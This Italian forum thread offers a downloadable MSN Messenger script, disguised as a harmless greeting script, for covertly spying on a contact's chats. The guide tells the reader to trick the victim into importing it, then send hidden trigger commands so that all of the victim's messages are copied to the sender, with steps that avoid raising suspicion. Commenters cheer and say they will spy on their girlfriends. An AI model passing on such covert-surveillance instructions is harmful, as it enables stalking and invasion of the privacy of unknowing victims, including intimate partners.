Guida Spiare le conversazioni di msn di un contatto in tempo reale!

stefanix2009

Utente Senior
Autore del topic
21 Giugno 2008
1.751
22
Miglior risposta
0
ciao a tutti ragazzi oggi vi darò uno script per spiare le conversazioni di msn di un contatto :emoji_slight_smile:
nel win rar ce la guida e lo script :emoji_slight_smile:
rapidshare:
Perfavore, Entra oppure Registrati per vedere i Link!

mediafire:
Perfavore, Entra oppure Registrati per vedere i Link!

megaupload:
Perfavore, Entra oppure Registrati per vedere i Link!


scansione virus total:
Perfavore, Entra oppure Registrati per vedere i Link!



in pc world (forum da dove ho scritto la guida) sono FoX* e sono bannato ecco xk ho deciso di inserire la guida anke qui xD


guida : (ce anche nell archivio win rar ma ve la scrivo anke qui )
Lo script Hello e' stato realizzato esclusivamente per fare innocui scherzi ad amici. L'autore non si assume alcuna responsabilita' sul diverso utilizzo che ne potrebbe essere fatto né sulle eventuali conseguenze.


ISTRUZIONI
==========

Inviate il file Hello.plsc alla vittima dicendole che si tratta di uno script che saluta e dice la data ogni volta che ci si connette a Messenger.

Dopo che la vittima avra' importato tale script, aprite una finestra di chat con lei e inviate il comando:

St4rT

(il terzo carattere e' un quattro) rispettando maiuscole, minuscole e disattivando eventuali script che colorano il testo.

A questo punto tutti i messaggi che la vittima inviera' e ricevera', arriveranno anche a voi.

Per interrompere la spia, aprite nuovamente una finestra di chat con la vittima e inviate il comando:

St0p

(il terzo carattere e' uno zero) rispettando maiuscole, minuscole e disattivando eventuali script che colorano il testo.

Durante la fase di spionaggio non potrete contattare la vittima e se sara' lei a contattarvi lo script si disattivera' automaticamente per non destare sospetti.

Inviando i comandi St4rT e St0p la finestra di chat della vittima si chiudera' automaticamente impedendole di vedere la parola scritta.
A Vostro Rischio E Responsabilità
fonte: mia
 
Ultima modifica:
AHHAAHHA BELLISSIMO :p ORA SPIO QUELLA DELLA MIA RAGAZZA :p
 
wow ottimo script ora vedo anch'io la mia ragazza muhaahahah
 
bella guida grazie ora spio a un che dice ke sono antipatico :patkill: vdm di cosa parla :controllo:
 
Muahhhhh funziona! l'unico problema è che alla vittima si apre e chiude la conversazione con noi ed'è fastidioso xD
 
Ultima modifica: